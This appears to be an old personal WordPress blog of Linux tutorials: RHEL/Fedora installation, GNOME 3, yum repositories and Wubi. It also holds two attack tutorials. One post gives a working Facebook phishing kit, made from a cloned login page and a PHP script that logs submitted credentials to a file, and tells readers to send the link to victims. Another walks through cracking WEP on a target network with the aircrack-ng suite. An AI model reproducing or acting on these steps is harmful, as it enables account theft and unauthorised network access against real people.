CoolDudeshwar

Just another WordPress.com site

Hello world! November 26, 2011

Filed under: Linux — vk3dvicky @ 12:41 pm

Welcome to WordPress.com. After you read this, you should delete and write your own post, with a new title above. Or hit Add New on the left (of the admin dashboard) to start a fresh post.

Here are some suggestions for your first post.

  1. You can find new ideas for what to blog about by reading the Daily Post.
  2. Add PressThis to your browser. It creates a new blog post for you about any interesting  page you read on the web.
  3. Make some changes to this page, and then hit preview on the right. You can always preview any post or edit it before you share it to the world.
 

How to hack facebook account via phishing November 23, 2011

Filed under: Linux — vk3dvicky @ 3:27 pm

Phishing is the process of stealing sensitive information, such as
usernames, passwords, and bank information, by pretending to be someone
you’re not. Phishing is the most preffered way of hacking passwords. This attack can be carried out by two simple web languages(HTML and PHP)

HTML  —>>>   For creating webpages.
PHP     —>>>   For Server side scripting.

Ok, lets go through an example of how to hack facebook accounts.

  What is phishing(FRONT-END)     

phishing ~ fishing  :p

  • Facebook Login page:- Suppose when you go to www.facebook.com/ a Login form is gets loaded, which asks you to enter your username and password, after entering username and password, when you click on Login button your username and passwords gets checked for authorization, if it is true then your fb’s home page is shown to you.

  • Facebook Fake Login Page:- In phishing, the hacker sends the victim to a fake facebook login page, which looks almost same as the facebook’s real Login page, and victims thinks that it is a regular fb page. Now when the user enter his username and password on this fake page, and clicks on Log In button, username and password entered gets stored into a text file by using php, and this text file is only readable by the hacker. and you are redirected to another page rather than in your fb’s home page.

Follow these steps to create fake facebook login page.(BACK-END)

  • Go to www.facebook.com and right click on the page and select Save page as and save the page as facebook.html 
  • Next you have to create a php script(for writing passwords in text files). Open Notepad, gedit or any text editor and copy these lines to the file, and save it as phish.php
NOTE: save the file as .php extension

<?php
Header(“Location:
https://www.google.com/accounts/ServiceLogin?service=mail&passive=
true&rm=false&continue=http%3A%2F%2Fmail.google.com%2Fmail%2F
%3Fui%3Dhtml%26zy%3Dl&bsv=1k96igf4806cy&ltmpl=default&ltmplcac
he=2 “); 
$handle = fopen(“list.txt”, “a”);
Foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
Fwrite($handle, “\r\n”);
fclose($handle);
exit;
?> // Marks the end of the PHP program.
  • Now you have to link the facebook.html page with the phish.php script. For that open facebook.html file in Notepad, it will show you html tags, Now press ctrl+F (Find)   and find for word action . it will be something like action=” “ .change it to action=”phish.php” and next look for the word method in the same line like method=” “ assign the method to post method by writing method=”post”

 NOTE:- There are two “action” occurrences in the script so make sure you havethe right one by looking at the “form id” name above. Change the link between action = “ “ to phish.php.

  •  Now save the file facebook.html and exit

  • Now you have upload the files facebook.html and phish.php into a free webhost service,so that u can send link to the victim through internet. With a simple Google search you can come up with a
    bunch that fall under this category.
    Free webhost services:- http://www.my3gb.com , http://www.110mb.com

 Suppose i have created an account in my3gb.com as vkedvicky(username). so my site will have an address like http://www.vkedvicky.my3gb.com.

  •  Create an account in any of the webhost service(my3gb, 110mb) and then go to the control_panel/file_manager of your webhost service account and upload the two files facebook.html and phish.php.

The file facebook.html you have just uploaded will have the link as http://www.your-site-name.my3gb.com/facebook.html

 TESTING

facebook fake login page, hosted on http://www.my3gb.com, check address http://www.vkedvicky.my3gb.com/facebook.html 
  • Enter username and password. and hit login.
  • goto your webhosting service file_manager/control_manager page and open the list.txt file. it will contain the username and password you have entered.

Now you can send the link http://www.you-site-name.my3gb.com/facebook.html to the person, who you want to hack. you can send it through Emails, facebook ,orkut, google+ or any other source:p
 

Download Windows 8 Transformation pack

Filed under: Linux — vk3dvicky @ 10:38 am
Windows 8
For Windows 8  REVIEW
For Windows 8  TIPS AND TRICKS

NOTE:- First Download and install .NET Framework4 and then install Windows 8 transformation pack

NOTE: Windows 8 transformation pack requires Microsoft .NET Framework

 

How to install Fedora/RHEL(Red Hat Enterprise Linux) with Windows November 21, 2011

Filed under: Linux — vk3dvicky @ 10:40 am

Red Hat-6 RHEL (Red Hat Enterprise Linux) installation guide, step-by-step walkthrough with screenshots.(Fedora installation follows same steps)

DOWNLOAD Fedora 16

 

 

DOWNLOAD FEDORA-16 

 

  

 

 

 

 

DOWNLOAD RHEL

The Red Hat Enterprise Linux 6 Beta is available on the following architectures:

  • i386
  • AMD64/Intel64
  • System z
  • IBM Power (64-bit)

DOWNLOAD RHEL-6 

 

NEW FEATURES(RHEL 6.2)

  • Power management – tickless kernel and improvements through the application stack to reduce wakeups, power consumption measurement by Powertop, Power Management (ASPM, ALPM), and adaptive system tuning by Tuned, all enhance more efficient system power usage.
  • Next generation networking – comprehensive IPv6 support (NFS 4, CIFS, mobile support [RFC 3775], ISATAP support), FCoE, iSCSI, and a new and improved mac 802.11 wireless stack.
  • Scalable filesystems – ext4 file system provides support for larger file sizes and significantly reduces repair times over ext3. XFS® is a high-performance file system that supports extremely large files and is optimized for large data transfers.
  • Virtualization – KVM includes performance improvements and new features, sVirt protects the guest and host from unauthorized access, SR-IOV and NPIV deliver high-performance virtual use of physical devices, and libvirt leverages kernel resource management functionality.
  •  Enterprise security enhancement – SELinux includes improved ease of use, application sandboxing, and significantly increased coverage of system services, while SSSD provides unified access to identity and authentication services as well as caching for off-line use.
  • Development and runtime support – SystemTap improvements, ABRT is a new framework for simple collection and reporting of bug information, and improvements are made to GCC (version 4.4.3), glibc (version 2.11.1), and GDB (version 7.0.1).

RHEL INSTALLATION

 

 

1). SELECT INSTALL OR UPGRADE AN EXISTING SYSTEM OPTION ON GRUB MENU

 

  1. Select first option to install a fresh copy of RHEL.
  2. Select second option to install RHEL with basic video driver support.
  3. Rescue your previous installed system. (Eg:- error in your grub boot menu).
  4. Boot into installed system from local drive.

2). Choose a language

3). Choose a keyboard type

4). Choose a installation media. (choose local CD/DVD)

5). Skip DVD media test(or select media test, if you want to test installation media before installation)

 

 

 

 

 

6). RedHat-6 GUI installer starts

 

 

 

7). Accept pre-installation

 

 

 

8). Select storage device

 

 

 

 

9). Enter computer name and password

11

11). Select create Custom Layout for DUAL booting withWndows

 

 

 

12).  Final Layout

  • Now Double Click on the Drive Partition, in which you want to install RHEL. and give ( / ) as mount point.

    (Eg:- if you want to install RHEL in drive sda3. Double Click on sda3 and click on the mount point drop-down box and select  /   ) [ root = /  ]…… format drive(sda3) as EXT*.

    • Now for Creating a LVM Group. 

      Create a minimum of 500mb partition as LVM.

      (Eg:- double click on sda* and select it as SWAP and alocate memory,  minimum of 500mb)

       For swap, create another partition as SWAP about 2x your memory(RAM). 

      (Eg:- double click on sda* and select it as SWAP and alocate memory,  twice as main memory)

        

       

      NEXT SCREEN

 

 

NEXT SCREEN

 

 

13). Configure BOOT loader option

14). Check Customize now option on left-down side of the dialog box to select softwares to be installed


 

 

NEXT SCREEN

 

 

NEXT SCREEN

 

 

 

NEXT SCREEN

 

 

REBOOT

 

 

BOOT into RHEL

 

 

CREATE A NEW USER

 

 

NEXT SCREEN

 

 

LOGIN TO ACCOUNT

 

 

NEXT SCREEN

 

 

JOB D0NE  😛

 

GNOME 3 November 20, 2011

Filed under: Linux — vk3dvicky @ 5:21 pm

Did you ever tried the latest Gnome 3 yet? It is very superb, i must say so! This script from GNOME site is very simple in use and this way I’m running GNOME Shell under Fedora 14.

Go through the steps to install gnome3 shell.
OR Download GNOME3

So, go to terminal(ctrl+alt+T) and your user directory and type:

  • Then you type:
    $ /bin/bash gnome-shell-build-setup.sh
  • Then type $ jhbuild build

  • To run gnome-shell after a build, run the wrapper script, which will take care of sandboxing and run gnome-shell automatically.
  • $ cd ~/gnome-shell/source/gnome-shell/src
  • $ ./gnome-shell –replace

Everything should go fine!

   REFERENCE       :- http://live.gnome.org/GnomeShell

   SCREENSHOTS  :-





 

How to Crack a Wi-Fi Network’s WEP Password with BackTrack November 8, 2011

Filed under: Linux — vk3dvicky @ 1:39 pm

If you want to make your Wi-Fi network more secured, you should opt for wpa encryption(Wi-Fi Protected Access.) because WEP( Wired Equivalent Privacy) is easy to crack. In this tutorial i will tell you how to crack WEP encrypted wi-fi networks.

  • wpa encryption:- hard to crack. can be cracked with brute-force attack,  dictionary & rainbow attack…… and you already know these attacks takes long time to succeed…..
  • wep encryption:- easy to break. softwares needed 

Tools needed (WEP):-
Kismet,
airmon,
airodump,
aireplay,
aircrack,
iwconfig,
macchanger

  • Kismet – a wireless network detector and packet sniffer
  • airmon – a tool that can help you set your wireless adapter into monitor mode (rfmon)
  • airodump – a tool for capturing packets from a wireless router (otherwise known as an AP)
  • aireplay – a tool for forging ARP requests
  • aircrack – a tool for decrypting WEP keys
  • iwconfig – a tool for configuring wireless adapters. You can use this to ensure that your wireless adapter is in “monitor” mode which is essential to sending fake ARP requests to the target router
  • macchanger – a tool that allows you to view and/or spoof (fake) your MAC address

Glossary
  • AP: Access Point: a wireless router
  • MAC Address: Media Access Control address, a unique id assigned to wireless adapters and routers. It comes in hexadecimal format (ie 00:11:ef:22:a3:6a)
  • BSSID: Access Point’s MAC address
  • ESSID: Access Point’s Broadcast name. (ie linksys, default, belkin etc) Some AP’s will not broadcast their name but Kismet may be able to detect it anyway
  • TERMINAL: MS-Dos like command line interface. You can open this by clicking the black box icon next to the start key in backtrack
  • WEP: short for Wired Equivalency Privacy, it is a security protocol for Wi-Fi networks
  • WPA: short for WiFi Protected Access. a more secure protocal than WEP for wireless networks.

What is a Live CD?

Ans:- Live cd is the method to boot a operating system, without actually installing it. just insert the disk into cd-rom and boot :p.

For this tutorial we will be using Linux Backtrack Live CD(penetration with linux kernel).

DOWNLOAD BACKTRACK (its free, Linux is always free :D)

After you have finish downloading, Burn the iso image onto a disk, or simply use UNetbootin to use Backtrack

For installation using UNetbootin, check this post UNetbootin Installation

Live CD users follow these instructions:-

  • Insert the newly created Backtrack live CD in cd-rom, and then boot
  • Now you will be prompt with boot: press enter.
  • Now choose the first option to use Backtrack as Live OS.
  • Just sit for a 2 mins, while the kernel gets loaded up. Then you will be prompted with Login: 
  • Enter root (this is super user in Linux)
  • and then type toor (NOTE: toor is your default password for root username. keys you will type at pasword will not be echoed)
  • then you will be logged in as root(super user in *ux)
  • Now type startx and press enter (this will start your backtrack’s X-Session(GUI)).

Thats all, You are using a Live OS :p

Now follow these instructions to hack wi-fi(wep)
  • STEP 1:-
Open Terminal(ctrl+alt+T)   and Type
$ kismet               (NOTE: donot type the $ sign)

Kismet will start running and may prompt you for your wireless adapter. Choose the appropriate adapter, most likely ‘ath0′, and sit back as kismet starts detecting networks in range.

NOTE: We use kismet for two reasons.

  1. To find the bssid, essid, and channel number of the AP you are accessing.
  2. Kismet automatically puts your wireless adapter into monitor mode (rfmon). It does this by creating a VAP (virtual access point?) or in other words, instead of only having ath0 as my wireless card it creates a virtual wifi0 and puts ath0 into monitor mode automatically. To find out your device’s name just type:



$ iwconfig

While kismet detects networks and various clients accessing those networks you might want to type ‘s’ and then ‘Q’ (case sensitive). This sorts all of the AP’s in your area by their signal strength. The default ‘autofit’ mode that kismet starts up in doesn’t allow you much flexibility. By sorting AP’s by signal strength you can scroll through the list with the arrow keys and hit enter on any AP you want more information on. (side note: when selecting target AP keep in mind this tutorial only covers accessing host AP’s that use WEP encryption. In kismet the flags for encryption are Y/N/0. Y=WEP N=Open Network- no encryption 0= other: WPA most likely.) Further reading on Kismet is available here.
Select the AP (access point) you want to access. Copy and paste the broadcast name(essid), mac address(bssid), and channel number of your target AP into a text editor. Backtrack is KDE based so you can use kwrite. Just open a terminal and type in ‘kwrite’ or select it from the start button. In Backtrack’s terminal to copy and paste you use shift+ctrl+c and shift+control+v respectively. Leave kismet running to leave your wireless adapter in monitor mode. You can also use airmon to do this manually. airmon-ng -h for more help with this

  • STEP 2:-

Collecting Data With Airodump

Open up a new terminal and start airodump so we can collect ARP replies from the target AP. Airodump is fairly straight forward for help with this program you can always type “airodump-ng -h” at the command prompt for additional options.

airodump-ng ath0 -w /mnt/hda2/home/ryan/belkin_slax_rcu 9 1

Breaking down this command:

  • ath0 is my wireless card
  • -w tells airodump to write the file to
    /mnt/hda2/ryan/belkin_slax_rcu
  • 9 is the channel 9 of my target AP
  • 1 tells airodump to only collect IVS – the data packets with the WEP key
  • STEP 3:-

Associate your wireless card with the AP you are accessing.

aireplay-ng -1 0 -e belkin -a 00:11:22:33:44:55 -h 00:fe:22:33:f4:e5 ath0

  • -1 at the beginning specifies the type of attack. In this case we want fake authentication with AP. You can view all options by typing aireplay-ng -h
  • 0 specifies the delay between attacks
  • -e is the essid tag. belkin is the essid or broadcast name of my target AP. Linksys or default are other common names
  • -a is the bssid tag(MAC address). 00:11:22:33:44:55 is the MAC address of the target AP
  • -h is your wireless adapters MAC addy. You can use macchanger to view and change your mac address. macchanger -s ath0
  • ath0 at the end is my wireless adapters device name in linux

 

  • STEP 4:-

Start packet injection with aireplay

aireplay-ng -3 -b 00:11:22:33:44:55 -h 00:fe:22:33:f4:e5 ath0

NOTES:

  • -b requires the MAC address of the AP we are accessing.
  • -h is your wireless adapters MAC addy. You can use macchanger to view and change your mac address. macchanger -s ath0
  • if packets are being collected at a slow pace you can typeiwconfig ath0 rate auto to adjust your wireless adapter’s transmission rate. You can find your AP’s transmission rate in kismet by using the arrow keys up or down to select the AP and hitting enter. A dialog box will pop up with additional information. Common rates are 11M or 54M.

As aireplay runs, ARP packets count will slowly increase. This may take a while if there aren’t many ARP requests from other computers on the network. As it runs however, the ARP count should start to increase more quickly. If ARP count stops increasing, just open up a new terminal and re-associate with the ap via step 3. There is no need to close the open aireplay terminal window before doing this. Just do it simultaneously. You will probably need somewhere between 200-500k IV data packets for aircrack to break the WEP key.

If you get a message like this:

Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Just reassociate with the AP following the instructions on step 3.

  • STEP 5:-

Decrypting the WEP Key with Aircrack

Find the location of the captured IVS file you specified in step 2. Then type in a terminal:

aircrack-ng -s /mnt/hda2/home/belkin_slax_rcu-03.ivs

Change /mnt/hda2/home/belkin_slax_rcu-03.ivs to your file’s location
Once you have enough captured data packets decrypting the key will only take a couple of seconds. For my AP it took me 380k data packets. If aircrack doesn’t find a key almost immediately, just sit back and wait for more data packets.
If this guide doesn’t fully answer your questions you can always refer to the forums at remote-exploit.org

:p

 

How to create a local yum repository November 7, 2011

Filed under: Linux — vk3dvicky @ 4:45 pm

How to create a local repository. you need to have rpm packages downloaded in your system. generally you can find packages in redhat/fedora disks.

  • Copy the data from the disk in to your system.(eg: i have copied all the packages from CD to my system in /home/vicky/packages/ ).
  • Then create the repo file in /etc/yum.repos.d/ as local.repo(or whatever you like). write these into the files.
[iso]
name=local repository
baseurl=file:///home/vicky/packages/
enabled=1
gpgcheck=0
Note:- use file:// protocol for local repository, and http:// protocol over network
  • Description of script
[local]                                 #any name to identify repo file
name=local repository      #any name for your repofile to display its info
baseurl=file:///home/vicky/packages/             #URL to point your repodata directory on your hard_drive(how to find baseurl is given above in the tutorial).
enabled=1                                 #enabled=1, to enable the repo. and enabled=0, to disable repo.
gpgcheck=0                              #gpgcheck=1, to enable gpgcheck in repo. and gpgcheck=0 to disable gpgcheck.
:p
 

How to create EPEL repository for RHEL6

Filed under: Linux — vk3dvicky @ 11:14 am

RHEL uses yum(yellow-dog update manager) for software management. Yum allows you to add a new repository as a source to install binary software.

For RPMforge repository check this post  RPMforge repo

  • Understanding yum repository

yum repository configured using /etc/yum.conf file. Additional configuration files are also read from the directories set by the reposdir option (default is /etc/yum.repos.d and /etc/yum/repos.d.

  •  EPEL repository (Extra package for enterprise Linux)

Usually repository carries extra and useful packages. EPEL is one of such repository. You can easily configure EPEL repository for RHEL / Fedora just by configuring and running single RPM command:



How to create repository(repo file) for EPEL.

  • Now Login as root, and go to /etc/yum.repos.d/ directory, here all the yum repositories are stored.
  • create a file named as epel.repo (or whatever you like) in your favourite text editor( vi, Emacs, gedit ).

Write these lines into your epel.repo file(we will use the above copied link here for baseurl)

You can change the release version and basarch in the script, as supported by your distribution.

[epel]
name= epel repository     
baseurl=http://download.fedoraproject.org/pub/epel/6/i386
enabled=1
gpgcheck=0

  • Dats all for the script part, save the file, and now open terminal(ctrl + alt + T) and type yum search to search for a package, or yum install to install a package.


eg:- For installation of vlc player, we will give this command.

 sudo yum install vlc 

Then yum will check for the vlc dependencies, and if checked true, it will start downloading vlc and install it.

Description of code
[epel]                                 #any name to identify repo file
name=epel repository      #any name for your repofile to display its info
baseurl=http://download.fedoraproject.org/pub/epel/6/i386/             #URL to point your repodata directory on #web(how to find baseurl is given above in the tutorial).
enabled=1                                 #enabled=1, to enable the repo. and enabled=0, to disable repo.
gpgcheck=0                              #gpgcheck=1, to enable gpgcheck in repo. and gpgcheck=0 to disable gpgcheck.
:p
 

How to install Ubuntu under windows using wubi November 6, 2011

Filed under: Linux — vk3dvicky @ 6:23 pm

If u want, you can install Ubuntu in Windows, as a simple windows software. All you have to do is just Download and install wubi(Windows ubuntu Installer), and an iso image file of Ubuntu.
NOTE:- you can also install ubuntu under windows using UNetbootin. check this post. Unetbootin Ubuntu installation under Windows

  • Follow these steps to install ubuntu under windows using wubi
  1. Download Ubuntu + wubi
  2. Burn the downloaded ubuntu iso file in a CD/DVD. or you can use a virtual drive.
  3. Now insert the burnt Ubuntu disk in CD-ROM. and open the cd-drive from MyComputer. the Ubuntu setup screen will be displayed
  4. Now select the Drive to install Ubuntu, yes you can also choose c:\ (windows root drive) to install.
  5. Give the size/space for ubuntu, this starts from 3gb to ……. to work smoothly give atleast more than 5gb space.
  6. HIT Install. and let the process complete. after the installation, Reboot your system, all the available OS will be listed in the menu. select Ubuntu to boot Ubuntu.
JOB DONE  :p 
  • UNINSTALLING UBUNTU
  • Boot into windows, run Wubi, it will automatically prompt you to to uninstall ubuntu.
 

How to ceate rpmforge repository in RHEL / CentOS / Fedora Core

Filed under: Linux — vk3dvicky @ 4:46 pm

RHEL / CentOS / Fedora Core uses yum(yellow-dog update manager) for software management. Yum allows you to add a new repository as a source to install binary software.

For EPEL repository check this post  EPEL
  • Understanding yum repository

yum repository configured using /etc/yum.conf file. Additional configuration files are also read from the directories set by the reposdir option (default is /etc/yum.repos.d and /etc/yum/repos.d.

  • RPMforge repository

Usually repository carries extra and useful packages. RPMforge is one of such repository. You can easily configure RPMforge repository for RHEL / Fedora just by configuring and running single RPM command:



Follow these steps :-
 

 Here i will take an example of adding repository in RHEL6, 32-bit.

  • Go to http://apt.sw.be/. Here you can see different directories for particular Linux distribution(eg: RHEL / Fedora). Click on your distribution type, here i will select redhat.
  • Now in the redhat directory, select your release version (el stands for Enterprise Linux), I will select el6(for RHEL6), and then select the language (en for English)
  • Now select your system architecture(i386 for 32-bit).
  • From the 32-bit arch directory, click on rpmforge.  there you will find two directories. 1).  RPMS (RPM Source)   2).   repodata.
  • All the rpm packages are stored in RPMS directory, and the metadata for the source pacakages is stored in repodata.
  • While you are in the repodata directory, Copy the URL from the address bar, which will be like (http://apt.sw.be/redhat/el6/en/i386/rpmforge/) for RHEL6 32-bit. This link will be used in our rpmforge.repo file as our baseurl, to locate the packages and repodata on network.
  • How to create repository(repo file) for rpmforge.

  • Now Login as root, and go to /etc/yum.repos.d/ directory, here all the yum repositories are stored.
  • create a file named as rpmforge.repo (or whatever you like) in your favourite text editor( vi, Emacs, gedit ).

Write these lines into your rpmforge.repo file(we will use the above copied link here for baseurl)

[rpmforge]
name=rpmforge repository     
baseurl=http://apt.sw.be/redhat/el6/en/i386/rpmforge/
enabled=1
gpgcheck=0

  • Dats all for the script part, save the file, and now open terminal(ctrl + alt + T) and type yum search to search for a package, or yum install to install a package.

eg:- For installation of vlc player, we will give the command.


sudo yum install vlc

Then yum will check for the vlc dependencies, and if checked true, it will start downloading vlc and install it.

  • Description of code
[rpmforge]                                 #any name to identify repo file
name=rpmforge repository      #any name for your repofile to display its info
baseurl=http://apt.sw.be/redhat/el6/en/i386/rpmforge/             #URL to point your rpmforge directory on #web(how to find baseurl is given above in the tutorial).
enabled=1                                 #enabled=1, to enable the repo. and enabled=0, to disable repo.
gpgcheck=0                              #gpgcheck=1, to enable gpgcheck in repo. and gpgcheck=0 to disable gpgcheck.
:p